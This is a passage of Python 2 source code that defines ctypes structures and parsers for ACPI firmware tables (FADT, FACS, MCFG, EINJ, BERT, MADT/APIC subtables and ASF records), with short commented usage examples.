('data', ctypes.c_uint32),
('bits', facp_flags_bits_v5),
]
class facp_iapc_arch_bits_v5(bits.cdata.Struct):
_pack_ = 1
_fields_ = copy.copy(facp_iapc_arch_bits_v4._fields_) + [
('cmos_rtc_not_present', ctypes.c_uint16, 1),
]
class facp_iapc_arch_v5(bits.cdata.Union):
_pack_ = 1
_anonymous_ = ("bits",)
_fields_ = [
('data', ctypes.c_uint16),
('bits', facp_iapc_arch_bits_v5),
]
class FACP_v5(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('header', TableHeader),
('firmware_ctrl', ctypes.c_uint32),
('dsdt', ctypes.c_uint32),
('reserved0', ctypes.c_uint8),
('preferred_pm_profile', ctypes.c_uint8),
('sci_int', ctypes.c_uint16),
('smi_cmd', ctypes.c_uint32),
('acpi_enable', ctypes.c_uint8),
('acpi_disable', ctypes.c_uint8),
('s4bios_req', ctypes.c_uint8),
('pstate_cnt', ctypes.c_uint8),
('pm1a_evt_blk', ctypes.c_uint32),
('pm1b_evt_blk', ctypes.c_uint32),
('pm1a_cnt_blk', ctypes.c_uint32),
('pm1b_cnt_blk', ctypes.c_uint32),
('pm2_cnt_blk', ctypes.c_uint32),
('pm_tmr_blk', ctypes.c_uint32),
('gpe0_blk', ctypes.c_uint32),
('gpe1_blk', ctypes.c_uint32),
('pm1_evt_len', ctypes.c_uint8),
('pm1_cnt_len', ctypes.c_uint8),
('pm2_cnt_len', ctypes.c_uint8),
('pm_tmr_len', ctypes.c_uint8),
('gpe0_blk_len', ctypes.c_uint8),
('gpe1_blk_len', ctypes.c_uint8),
('gpe1_base', ctypes.c_uint8),
('cst_cnt', ctypes.c_uint8),
('p_lvl2_lat', ctypes.c_uint16),
('p_lvl3_lat', ctypes.c_uint16),
('flush_size', ctypes.c_uint16),
('flush_stride', ctypes.c_uint16),
('duty_offset', ctypes.c_uint8),
('duty_width', ctypes.c_uint8),
('day_alrm', ctypes.c_uint8),
('mon_alrm', ctypes.c_uint8),
('century', ctypes.c_uint8),
('iapc_boot_arch', facp_iapc_arch_v5),
('reserved1', ctypes.c_uint8),
('flags', facp_flags_v5),
('reset_reg', GAS),
('reset_value', ctypes.c_uint8),
('reserved2', ctypes.c_uint8 * 3),
('x_firmware_ctrl', ctypes.c_uint64),
('x_dsdt', ctypes.c_uint64),
('x_pm1a_evt_blk', GAS),
('x_pm1b_evt_blk', GAS),
('x_pm1a_cnt_blk', GAS),
('x_pm1b_cnt_blk', GAS),
('x_pm2_cnt_blk', GAS),
('x_pm_tmr_blk', GAS),
('x_gpe0_blk', GAS),
('x_gpe1_blk', GAS),
('sleep_control_reg', GAS),
('sleep_status_reg', GAS),
]
_formats = {
'preferred_pm_profile': unpack.format_table("{}", _preferred_pm_profile),
}
def FACP(val):
"""Create class based on decode of an FACP table from address or filename."""
addr = val
if isinstance(val, str):
data = open(val).read()
buf = ctypes.create_string_buffer(data, len(data))
addr = ctypes.addressof(buf)
hdr = TableHeader.from_address(addr)
if hdr.revision < 3:
cls = FACP_v1
elif hdr.revision == 3:
cls = FACP_v3
elif hdr.revision == 4:
cls = FACP_v4
else:
cls = FACP_v5
if isinstance(val, str):
return cls.from_buffer_copy(data)
return cls.from_address(addr)
parse_facp = make_compat_parser("FACP")
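# Example (a sketch): inspect a few FADT fields.  preferred_pm_profile and the
# extended flags shown here exist only in the revision 3 and later layouts.
#   facp = parse_facp()
#   if facp is not None:
#       print facp.preferred_pm_profile
#       print bool(facp.flags.bits.wbinvd), bool(facp.flags.bits.headless)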
class facs_global_lock_bits(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('pending', ctypes.c_uint32, 1),
('owned', ctypes.c_uint32, 1),
]
class facs_global_lock(bits.cdata.Union):
_pack_ = 1
_anonymous_ = ("bits",)
_fields_ = [
('data', ctypes.c_uint32),
('bits', facs_global_lock_bits),
]
class facs_flags_bits(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('s4bios_f', ctypes.c_uint32, 1),
]
class facs_flags(bits.cdata.Union):
_pack_ = 1
_anonymous_ = ("bits",)
_fields_ = [
('data', ctypes.c_uint32),
('bits', facs_flags_bits),
]
class facs_flags_bits_v2(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('s4bios_f', ctypes.c_uint32, 1),
('64bit_wake_supported_f', ctypes.c_uint32, 1),
]
class facs_flags_v2(bits.cdata.Union):
_pack_ = 1
_anonymous_ = ("bits",)
_fields_ = [
('data', ctypes.c_uint32),
('bits', facs_flags_bits_v2),
]
class facs_ospm_flags_bits(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('64bit_wake_f', ctypes.c_uint32, 1),
]
class facs_ospm_flags(bits.cdata.Union):
_pack_ = 1
_anonymous_ = ("bits",)
_fields_ = [
('data', ctypes.c_uint32),
('bits', facs_ospm_flags_bits),
]
class FACS_v0(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('signature', ctypes.c_char * 4),
('length', ctypes.c_uint32),
('hardware_signature', ctypes.c_uint32),
('firmware_waking_vector', ctypes.c_uint32),
('global_lock', facs_global_lock),
('flags', facs_flags),
('reserved', ctypes.c_uint8 * 40),
]
class FACS_v1(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('signature', ctypes.c_char * 4),
('length', ctypes.c_uint32),
('hardware_signature', ctypes.c_uint32),
('firmware_waking_vector', ctypes.c_uint32),
('global_lock', facs_global_lock),
('flags', facs_flags),
('x_firmware_waking_vector', ctypes.c_uint64),
('version', ctypes.c_uint8),
('reserved', ctypes.c_uint8 * 31),
]
class FACS_v2(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('signature', ctypes.c_char * 4),
('length', ctypes.c_uint32),
('hardware_signature', ctypes.c_uint32),
('firmware_waking_vector', ctypes.c_uint32),
('global_lock', facs_global_lock),
('flags', facs_flags_v2),
('x_firmware_waking_vector', ctypes.c_uint64),
('version', ctypes.c_uint8),
('pad', ctypes.c_uint8 * 3),
('ospm_flags', facs_ospm_flags),
('reserved', ctypes.c_uint8 * 24),
]
def FACS(val):
"""Create class based on decode of an FACS table from address or filename."""
addr = val
if isinstance(val, str):
data = open(val).read()
buf = ctypes.create_string_buffer(data, len(data))
addr = ctypes.addressof(buf)
cls = FACS_v0
r = FACS_v0.from_address(addr)
if r.length != ctypes.sizeof(FACS_v0):
r = FACS_v1.from_address(addr)
if r.version == 1:
cls = FACS_v1
elif r.version == 2:
cls = FACS_v2
if isinstance(val, str):
return cls.from_buffer_copy(data)
return cls.from_address(addr)
parse_facs = make_compat_parser("FACS")
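# Example (a sketch): the FACS is located through the FADT's firmware_ctrl
# pointer rather than the RSDT/XSDT, so this relies on get_table_addr("FACS")
# resolving it; once decoded, the waking vector and global lock are available.
#   facs = parse_facs()
#   if facs is not None:
#       print hex(facs.firmware_waking_vector), facs.global_lock.bits.owned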
class MCFGResource(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('address', ctypes.c_uint64),
('segment', ctypes.c_uint16),
('start_bus', ctypes.c_uint8),
('end_bus', ctypes.c_uint8),
('reserved', ctypes.c_uint32),
]
def mcfg_factory(num_resources):
"""Create variable-sized MCFG table based on the number of resources."""
class MCFG(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('header', TableHeader),
('reserved', ctypes.c_uint64),
('resources', num_resources * MCFGResource),
]
return MCFG
def MCFG(val):
"""Create class based on decode of an MCFG table from address or filename."""
addr = val
if isinstance(val, str):
data = open(val).read()
buf = ctypes.create_string_buffer(data, len(data))
addr = ctypes.addressof(buf)
hdr = TableHeader.from_address(addr)
num_tables = (hdr.length - ctypes.sizeof(mcfg_factory(0))) / ctypes.sizeof(MCFGResource)
if isinstance(val, str):
return mcfg_factory(num_tables).from_buffer_copy(data)
return mcfg_factory(num_tables).from_address(addr)
parse_mcfg = make_compat_parser("MCFG")
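# Example (a sketch): under the standard PCIe ECAM layout, a function's config
# space lives at base + ((bus - start_bus) << 20 | device << 15 | function << 12).
# The bus/device/function values below are purely illustrative.
#   mcfg = parse_mcfg()
#   if mcfg is not None:
#       res = mcfg.resources[0]
#       cfg = res.address + (((2 - res.start_bus) << 20) | (0 << 15) | (0 << 12))
#       print "seg {} bus 2 dev 0 fn 0 config space at {:#x}".format(res.segment, cfg)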
class trigger_error_header(bits.cdata.Struct):
"""Trigger error header used with the trigger_error_action table."""
_pack_ = 1
_fields_ = [
('header_size', ctypes.c_uint32),
('revision', ctypes.c_uint32),
('table_size', ctypes.c_uint32),
('entry_count', ctypes.c_uint32),
]
def trigger_error_action_factory(num_entries):
"""Create variable-sized trigger error action table based on the number of trigger error instruction entries."""
class trigger_error_action(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('header', trigger_error_header),
('entries', num_entries * InjectionInstructionEntry),
]
return trigger_error_action
def trigger_error_action(val):
"""Create class based on decode of an trigger_error_action table from address or filename."""
addr = val
if isinstance(val, str):
data = open(val).read()
buf = ctypes.create_string_buffer(data, len(data))
addr = ctypes.addressof(buf)
hdr = trigger_error_header.from_address(addr)
num_entries = (hdr.table_size - ctypes.sizeof(trigger_error_action_factory(0))) / ctypes.sizeof(InjectionInstructionEntry)
if isinstance(val, str):
        return trigger_error_action_factory(num_entries).from_buffer_copy(data)
return trigger_error_action_factory(num_entries).from_address(addr)
_error_injection_action = {
0x0 : 'BEGIN_INJECTION_OPERATION',
0x1 : 'GET_TRIGGER_ERROR_ACTION_TABLE',
0x2 : 'SET_ERROR_TYPE',
0x3 : 'GET_ERROR_TYPE',
0x4 : 'END_OPERATION',
0x5 : 'EXECUTE_OPERATION',
0x6 : 'CHECK_BUSY_STATUS',
0x7 : 'GET_COMMAND_STATUS',
0x8 : 'SET_ERROR_TYPE_WITH_ADDRESS',
0xFF : 'TRIGGER_ERROR',
}
_error_injection_instruction = {
0x00 : 'READ_REGISTER',
0x01 : 'READ_REGISTER_VALUE',
0x02 : 'WRITE_REGISTER',
0x03 : 'WRITE_REGISTER_VALUE',
0x04 : 'NOOP',
}
class error_type_flags_bits(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('processor_correctable', ctypes.c_uint32, 1),
('processor_uncorrectable_non_fatal', ctypes.c_uint32, 1),
('processor_uncorrectable_fatal', ctypes.c_uint32, 1),
('memory_correctable', ctypes.c_uint32, 1),
('memory_uncorrectable_non_fatal', ctypes.c_uint32, 1),
('memory_uncorrectable_fatal', ctypes.c_uint32, 1),
('pci_express_correctable', ctypes.c_uint32, 1),
('pci_express_uncorrectable_non_fatal', ctypes.c_uint32, 1),
('pci_express_uncorrectable_fatal', ctypes.c_uint32, 1),
('platform_correctable', ctypes.c_uint32, 1),
('platform_uncorrectable_non_fatal', ctypes.c_uint32, 1),
        ('platform_uncorrectable_fatal', ctypes.c_uint32, 1),
('reserved_12_30', ctypes.c_uint32, 19),
('vendor_defined', ctypes.c_uint32, 1),
]
class error_type_flags(bits.cdata.Union):
_pack_ = 1
_anonymous_ = ("bits",)
_fields_ = [
('data', ctypes.c_uint32),
('bits', error_type_flags_bits),
]
class pcie_sbdf_struct_bits(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('reserved_8_0', ctypes.c_uint32, 8),
('function_num', ctypes.c_uint32, 3),
('device_num', ctypes.c_uint32, 5),
('bus_num', ctypes.c_uint32, 8),
('pcie_segment', ctypes.c_uint32, 8),
]
class pcie_sbdf_struct(bits.cdata.Union):
_pack_ = 1
_anonymous_ = ("bits",)
_fields_ = [
('data', ctypes.c_uint32),
('bits', pcie_sbdf_struct_bits),
]
class set_error_type_with_addr_flags_bits(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('processor_apic_valid', ctypes.c_uint32, 1),
('memory_addr_and_mask_valid', ctypes.c_uint32, 1),
('pcie_sbdf_valid', ctypes.c_uint32, 1),
('reserved_31_3', ctypes.c_uint32, 29),
]
class set_error_type_with_addr_flags(bits.cdata.Union):
_pack_ = 1
_anonymous_ = ("bits",)
_fields_ = [
('data', ctypes.c_uint32),
('bits', set_error_type_with_addr_flags_bits),
]
class set_error_type_with_addr(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('error_type', error_type_flags),
('vendor_error_type_extension_structure_offset', ctypes.c_uint32),
('flags', set_error_type_with_addr_flags),
('apic_id', ctypes.c_uint32),
('memory_address', ctypes.c_uint64),
('memory_address_range', ctypes.c_uint64),
('pcie_sbdf', pcie_sbdf_struct),
]
class vendor_error_type_extension(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('length', ctypes.c_uint32),
('sbdf', pcie_sbdf_struct),
('vendor_id', ctypes.c_uint16),
('device_id', ctypes.c_uint16),
('rev_id', ctypes.c_uint8),
('reserved', ctypes.c_uint8 * 3),
]
class injection_instruction_entry_flags_bits(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('preserve_register', ctypes.c_uint8, 1),
]
class injection_instruction_entry_flags(bits.cdata.Union):
_pack_ = 1
_anonymous_ = ("bits",)
_fields_ = [
('data', ctypes.c_uint8),
('bits', injection_instruction_entry_flags_bits),
]
class InjectionInstructionEntry(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('injection_action', ctypes.c_uint8),
('instruction', ctypes.c_uint8),
('flags', injection_instruction_entry_flags),
('reserved', ctypes.c_uint8),
('register_region', GAS),
('value', ctypes.c_uint64),
('mask', ctypes.c_uint64),
]
_formats = {
'injection_action' : unpack.format_table("{}", _error_injection_action),
'instruction' : unpack.format_table("{}", _error_injection_instruction),
}
def einj_factory(num_entries):
"""Create variable-sized EINJ table based on the number of injection instruction entries."""
class EINJ(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('header', TableHeader),
('injection_header_size', ctypes.c_uint32),
('injection_flags', ctypes.c_uint8),
('reserved', 3 * ctypes.c_uint8),
('injection_entry_count', ctypes.c_uint32),
('entries', num_entries * InjectionInstructionEntry),
]
return EINJ
def EINJ(val):
"""Create class based on decode of an EINJ table from address or filename."""
addr = val
if isinstance(val, str):
data = open(val).read()
buf = ctypes.create_string_buffer(data, len(data))
addr = ctypes.addressof(buf)
hdr = TableHeader.from_address(addr)
num_entries = (hdr.length - ctypes.sizeof(einj_factory(0))) / ctypes.sizeof(InjectionInstructionEntry)
if isinstance(val, str):
return einj_factory(num_entries).from_buffer_copy(data)
return einj_factory(num_entries).from_address(addr)
parse_einj = make_compat_parser("EINJ")
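# Example (a sketch): list each EINJ injection instruction entry using the
# action/instruction lookup tables defined above.
#   einj = parse_einj()
#   if einj is not None:
#       for entry in einj.entries:
#           print _error_injection_action.get(entry.injection_action), \
#                 _error_injection_instruction.get(entry.instruction)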
class error_severity_flags_bits(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('correctable', ctypes.c_uint32, 1),
('fatal', ctypes.c_uint32, 1),
('corrected', ctypes.c_uint32, 1),
('none', ctypes.c_uint32, 1),
('reserved', ctypes.c_uint32, 28),
]
class error_severity_flags(bits.cdata.Union):
_pack_ = 1
_anonymous_ = ("bits",)
_fields_ = [
('data', ctypes.c_uint32),
('bits', error_severity_flags_bits),
]
class generic_error_data_entry(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('section_type', bits.cdata.GUID),
('error_severity', error_severity_flags),
('revision', ctypes.c_uint16),
('validation_bits', ctypes.c_uint8),
('flags', ctypes.c_uint8),
('error_data_length', ctypes.c_uint32),
#('FRU_id', ?),
('FRU_text', ctypes.c_uint8),
#('data', array of generic_error_data),
]
class block_status_flags_bits(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('uncorrectable_error_valid', ctypes.c_uint32, 1),
('correctable_error_valid', ctypes.c_uint32, 1),
('multiple_uncorrectable_errors', ctypes.c_uint32, 1),
('multiple_correctable_errors', ctypes.c_uint32, 1),
('error_data_entry_count', ctypes.c_uint32, 10),
('reserved', ctypes.c_uint32, 18),
]
class block_status_flags(bits.cdata.Union):
_pack_ = 1
_anonymous_ = ("bits",)
_fields_ = [
('data', ctypes.c_uint32),
('bits', block_status_flags_bits),
]
class boot_error_region(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('block_status', block_status_flags),
('raw_data_offset', ctypes.c_uint32),
('raw_data_length', ctypes.c_uint32),
('data_length', ctypes.c_uint32),
('error_severity', error_severity_flags),
('generic_error_data', generic_error_data_entry),
]
class BERT_v1(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('header', TableHeader),
('boot_error_region_length', ctypes.c_uint32),
('boot_error_region', ctypes.c_uint64),
]
def BERT(val):
"""Create class based on decode of an BERT table from address or filename."""
addr = val
if isinstance(val, str):
data = open(val).read()
buf = ctypes.create_string_buffer(data, len(data))
addr = ctypes.addressof(buf)
return BERT_v1.from_buffer_copy(data)
return BERT_v1.from_address(addr)
parse_bert = make_compat_parser("BERT")
class APICSubtable(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('subtype', ctypes.c_uint8),
('length', ctypes.c_uint8),
]
class local_apic_flags_bits(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('enabled', ctypes.c_uint32, 1),
]
class local_apic_flags(bits.cdata.Union):
_pack_ = 1
_anonymous_ = ("bits",)
_fields_ = [
('data', ctypes.c_uint32),
('bits', local_apic_flags_bits),
]
class APICSubtableLocalApic(bits.cdata.Struct):
_pack_ = 1
_fields_ = copy.copy(APICSubtable._fields_) + [
('proc_id', ctypes.c_uint8),
('apic_id', ctypes.c_uint8),
('flags', local_apic_flags),
]
class APICSubtableIOApic(bits.cdata.Struct):
_pack_ = 1
_fields_ = copy.copy(APICSubtable._fields_) + [
('io_apic_id', ctypes.c_uint8),
('reserved', ctypes.c_uint8),
('io_apic_addr', ctypes.c_uint32),
('global_sys_int_base', ctypes.c_uint32),
]
mps_inti_polarity = {
0b00: 'Conforms to bus specifications',
0b01: 'Active high',
0b11: 'Active low',
}
mps_inti_trigger_mode = {
0b00: 'Conforms to bus specifications',
0b01: 'Edge-triggered',
0b11: 'Level-triggered',
}
class APICSubtable_int_flags_bits(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('polarity', ctypes.c_uint16, 2),
('trigger_mode', ctypes.c_uint16, 2),
]
_formats = {
'polarity': unpack.format_table("{}", mps_inti_polarity),
'trigger_mode': unpack.format_table("{}", mps_inti_trigger_mode),
}
class APICSubtable_int_flags(bits.cdata.Union):
_pack_ = 1
_anonymous_ = ("bits",)
_fields_ = [
('data', ctypes.c_uint16),
('bits', APICSubtable_int_flags_bits),
]
class APICSubtableNmiIntSrc(bits.cdata.Struct):
_pack_ = 1
_fields_ = copy.copy(APICSubtable._fields_) + [
('flags', APICSubtable_int_flags),
('global_sys_interrupt', ctypes.c_uint32),
]
class APICSubtableLocalApicNmi(bits.cdata.Struct):
_pack_ = 1
_fields_ = copy.copy(APICSubtable._fields_) + [
('proc_id', ctypes.c_uint8),
('flags', APICSubtable_int_flags),
('lint_num', ctypes.c_uint8),
]
class APICSubtableIntSrcOverride(bits.cdata.Struct):
_pack_ = 1
_fields_ = copy.copy(APICSubtable._fields_) + [
('bus', ctypes.c_uint8),
('source', ctypes.c_uint8),
('global_sys_interrupt', ctypes.c_uint32),
('flags', APICSubtable_int_flags)
]
class APICSubtableLocalx2Apic(bits.cdata.Struct):
_pack_ = 1
_fields_ = copy.copy(APICSubtable._fields_) + [
('reserved', ctypes.c_uint16),
('x2apicid', ctypes.c_uint32),
('flags', local_apic_flags),
('uid', ctypes.c_uint32),
]
class APICSubtableLocalx2ApicNmi(bits.cdata.Struct):
_pack_ = 1
_fields_ = copy.copy(APICSubtable._fields_) + [
('flags', APICSubtable_int_flags),
('uid', ctypes.c_uint32),
('lint_num', ctypes.c_uint8),
('reserved', ctypes.c_uint8 * 3),
]
_performance_interrupt_mode = {
0: 'Level-triggered',
1: 'Edge-triggered',
}
class APICSubtableLocalGIC_flags_bits(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('enabled', ctypes.c_uint32, 1),
('performance_interrupt_mode', ctypes.c_uint32, 1),
]
_formats = {
        'performance_interrupt_mode': unpack.format_table("{}", _performance_interrupt_mode),
}
class APICSubtableLocalGIC_flags(bits.cdata.Union):
_pack_ = 1
_anonymous_ = ("bits",)
_fields_ = [
('data', ctypes.c_uint32),
('bits', APICSubtableLocalGIC_flags_bits),
]
class APICSubtableLocalGIC(bits.cdata.Struct):
_pack_ = 1
_fields_ = copy.copy(APICSubtable._fields_) + [
('reserved', ctypes.c_uint16),
('gic_id', ctypes.c_uint32),
('uid', ctypes.c_uint32),
('flags', APICSubtableLocalGIC_flags),
('parking_protocol_version', ctypes.c_uint32),
('performance_interrupt_gsiv', ctypes.c_uint32),
('parked_address', ctypes.c_uint64),
        ('physical_base_address', ctypes.c_uint64),
]
class APICSubtableLocalGICDistributor(bits.cdata.Struct):
_pack_ = 1
_fields_ = copy.copy(APICSubtable._fields_) + [
('reserved1', ctypes.c_uint16),
('gic_id', ctypes.c_uint32),
        ('physical_base_address', ctypes.c_uint64),
('system_vector_base', ctypes.c_uint32),
('reserved2', ctypes.c_uint32),
]
def APICSubtableUnknown_factory(_len):
class APICSubtableUnknown(bits.cdata.Struct):
_pack_ = 1
_fields_ = APICSubtable._fields_ + [
('data', ctypes.c_uint8 * _len),
]
return APICSubtableUnknown
MADT_TYPE_LOCAL_APIC = 0
MADT_TYPE_IO_APIC = 1
MADT_TYPE_INT_SRC_OVERRIDE = 2
MADT_TYPE_NMI_INT_SRC = 3
MADT_TYPE_LOCAL_APIC_NMI = 4
MADT_TYPE_LOCAL_X2APIC = 9
MADT_TYPE_LOCAL_X2APIC_NMI = 0xA
MADT_TYPE_LOCAL_GIC = 0xB
MADT_TYPE_LOCAL_GIC_DISTRIBUTOR = 0xC
class APIC_table_flags_bits(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('pcat_compat', ctypes.c_uint32, 1),
]
class APIC_table_flags(bits.cdata.Union):
_pack_ = 1
_anonymous_ = ("bits",)
_fields_ = [
('data', ctypes.c_uint32),
('bits', APIC_table_flags_bits),
]
def apic_factory(field_list):
class subtables(bits.cdata.Struct):
_pack_ = 1
_fields_ = field_list
def __iter__(self):
for f in self._fields_:
yield getattr(self, f[0])
class APIC_v3(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('header', TableHeader),
('local_apic_address', ctypes.c_uint32),
('flags', APIC_table_flags),
('interrupt_controller_structures', subtables),
]
@property
def procid_apicid(self):
procid_apicid_dict = {}
for subtable in self.interrupt_controller_structures:
# accumulate the dictionary
if subtable.subtype == MADT_TYPE_LOCAL_APIC:
if subtable.flags.bits.enabled == 1:
procid_apicid_dict[subtable.proc_id] = subtable.apic_id
return procid_apicid_dict
@property
def uid_x2apicid(self):
uid_x2apicid_dict = {}
for subtable in self.interrupt_controller_structures:
# accumulate the dictionary
if subtable.subtype == MADT_TYPE_LOCAL_X2APIC:
if subtable.flags.bits.enabled == 1:
uid_x2apicid_dict[subtable.uid] = subtable.x2apicid
return uid_x2apicid_dict
return APIC_v3
def apic_subtable_list(addr, length):
end = addr + length
field_list = list()
subtable_num = 0
while addr < end:
subtable_num += 1
subtable = APICSubtable.from_address(addr)
addr += subtable.length
if subtable.subtype == MADT_TYPE_LOCAL_APIC:
cls = APICSubtableLocalApic
elif subtable.subtype == MADT_TYPE_IO_APIC:
cls = APICSubtableIOApic
elif subtable.subtype == MADT_TYPE_INT_SRC_OVERRIDE:
cls = APICSubtableIntSrcOverride
elif subtable.subtype == MADT_TYPE_NMI_INT_SRC:
cls = APICSubtableNmiIntSrc
elif subtable.subtype == MADT_TYPE_LOCAL_APIC_NMI:
cls = APICSubtableLocalApicNmi
elif subtable.subtype == MADT_TYPE_LOCAL_X2APIC:
cls = APICSubtableLocalx2Apic
elif subtable.subtype == MADT_TYPE_LOCAL_X2APIC_NMI:
cls = APICSubtableLocalx2ApicNmi
elif subtable.subtype == MADT_TYPE_LOCAL_GIC:
cls = APICSubtableLocalGIC
elif subtable.subtype == MADT_TYPE_LOCAL_GIC_DISTRIBUTOR:
cls = APICSubtableLocalGICDistributor
else:
cls = APICSubtableUnknown_factory(subtable.length - ctypes.sizeof(APICSubtable))
field_list.append( ('subtable{}'.format(subtable_num), cls) )
return field_list
def APIC(val):
"""Create class based on decode of an APIC table from address or filename."""
preamble_length = ctypes.sizeof(apic_factory(list()))
addr = val
if isinstance(val, str):
data = open(val).read()
buf = ctypes.create_string_buffer(data, len(data))
addr = ctypes.addressof(buf)
hdr = TableHeader.from_address(addr)
subtable_list = apic_subtable_list(addr + preamble_length, hdr.length - preamble_length)
if isinstance(val, str):
return apic_factory(subtable_list).from_buffer_copy(data)
return apic_factory(subtable_list).from_address(addr)
def parse_apic(printflag=False, EnabledOnly=False, instance=1):
"""Parse and optionally print an ACPI MADT table."""
apic = parse_table("APIC", instance)
if apic is None:
        return None
if printflag:
with ttypager.page():
print apic
if EnabledOnly:
with ttypager.page():
print '\n'.join(str(subtable) for subtable in apic.interrupt_controller_structures if ((subtable.subtype in (MADT_TYPE_LOCAL_APIC, MADT_TYPE_LOCAL_X2APIC)) and subtable.flags.bits.enabled))
return apic
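# Example (a sketch): the decoded MADT exposes the helper properties defined on
# APIC_v3 above.
#   apic = parse_apic()
#   if apic is not None:
#       print apic.procid_apicid    # {ACPI processor ID: local APIC ID} for enabled CPUs
#       print apic.uid_x2apicid     # {processor UID: x2APIC ID} for enabled x2APIC CPUs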
def _mat_factory(field_list):
class _mat_subtables(bits.cdata.Struct):
_pack_ = 1
_fields_ = field_list
def __iter__(self):
for f in self._fields_:
yield getattr(self, f[0])
return _mat_subtables
def _MAT(mat_buffer):
"""Multiple APIC Table Entry"""
buf = ctypes.create_string_buffer(mat_buffer, len(mat_buffer))
addr = ctypes.addressof(buf)
subtable_list = apic_subtable_list(addr, len(buf))
return _mat_factory(subtable_list).from_buffer_copy(buf)
def parse_mat(mat_data):
"""Parse Multiple APIC Table Entry"""
return _MAT(mat_data)
class ASFSubtable(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('record_type', ctypes.c_uint8, 7),
('last_record', ctypes.c_uint8, 1),
('reserved', ctypes.c_uint8),
('record_length', ctypes.c_uint16),
]
def ASF_subtable_unknown_factory(data_len):
class ASFSubtableUnknown(bits.cdata.Struct):
_pack_ = 1
_fields_ = copy.copy(ASFSubtable._fields_) + [
('data', ctypes.c_uint8 * data_len),
]
return ASFSubtableUnknown
class ASF_info_flags_bits(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('smbus_support', ctypes.c_uint8, 1),
]
class ASF_info_flags(bits.cdata.Union):
_pack_ = 1
_anonymous_ = ("bits",)
_fields_ = [
('data', ctypes.c_uint8),
('bits', ASF_info_flags_bits),
]
class fixed_smbus_address(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('ASF_compliant_device', ctypes.c_uint8, 1),
('address', ctypes.c_uint8, 7),
]
class ASF_info_record(bits.cdata.Struct):
_pack_ = 1
_fields_ = copy.copy(ASFSubtable._fields_) + [
('min_watchdog_reset_value', ctypes.c_uint8),
        ('min_polling_interval', ctypes.c_uint8),
('system_id', ctypes.c_uint16),
('iana_manufacturer_id', ctypes.c_uint8 * 4),
('flags', ASF_info_flags),
('reserved2', ctypes.c_uint8 * 3),
]
class ASF_ALERTDATA(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('device_address', ctypes.c_uint8),
('command', ctypes.c_uint8),
('data_mask', ctypes.c_uint8),
('compare_value', ctypes.c_uint8),
('event_sensor_type', ctypes.c_uint8),
('event_type', ctypes.c_uint8),
('event_offset', ctypes.c_uint8),
('event_source_type', ctypes.c_uint8),
('event_severity', ctypes.c_uint8),
        ('sensor_number', ctypes.c_uint8),
('entity', ctypes.c_uint8),
('entity_instance', ctypes.c_uint8),
]
def ASF_alrt_factory(num_alerts):
class ASF_ALRT(bits.cdata.Struct):
_pack_ = 1
_fields_ = copy.copy(ASFSubtable._fields_) + [
('assertion_event_mask', ctypes.c_uint8),
('deassertion_event_mask', ctypes.c_uint8),
('number_alerts', ctypes.c_uint8),
('array_element_length', ctypes.c_uint8),
('device_array', ASF_ALERTDATA * num_alerts),
]
return ASF_ALRT
class ASF_CONTROLDATA(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('function', ctypes.c_uint8),
('device_address', ctypes.c_uint8),
('command', ctypes.c_uint8),
('data_value', ctypes.c_uint8),
]
def ASF_rctl_factory(num_controls):
class ASF_RCTL(bits.cdata.Struct):
_pack_ = 1
_fields_ = copy.copy(ASFSubtable._fields_) + [
('number_controls', ctypes.c_uint8),
('array_element_length', ctypes.c_uint8),
('reserved2', ctypes.c_uint16),
('control_array', ASF_CONTROLDATA * num_controls),
]
return ASF_RCTL
class ASF_boot_options_capabilities_1_bits(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('firmware_verbosity_screen_blank', ctypes.c_uint8, 1),
('power_button_lock', ctypes.c_uint8, 1),
('reset_button_lock', ctypes.c_uint8, 1),
('reserved_4_3', ctypes.c_uint8, 2),
('lock_keyboard', ctypes.c_uint8, 1),
('sleep_button_lock', ctypes.c_uint8, 1),
('reserved_7', ctypes.c_uint8, 1),
]
class ASF_boot_options_capabilities_1(bits.cdata.Union):
_pack_ = 1
_anonymous_ = ("bits",)
_fields_ = [
('data', ctypes.c_uint8),
('bits', ASF_boot_options_capabilities_1_bits),
]
class ASF_boot_options_capabilities_2_bits(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('reserved_2_0', ctypes.c_uint8, 3),
('user_password_bypass', ctypes.c_uint8, 1),
('forced_progress_events', ctypes.c_uint8, 1),
('firmware_verbosity_verbose', ctypes.c_uint8, 1),
('firmware_verbosity_quiet', ctypes.c_uint8, 1),
('configuration_data_reset', ctypes.c_uint8, 1),
]
class ASF_boot_options_capabilities_2(bits.cdata.Union):
_pack_ = 1
_anonymous_ = ("bits",)
_fields_ = [
('data', ctypes.c_uint8),
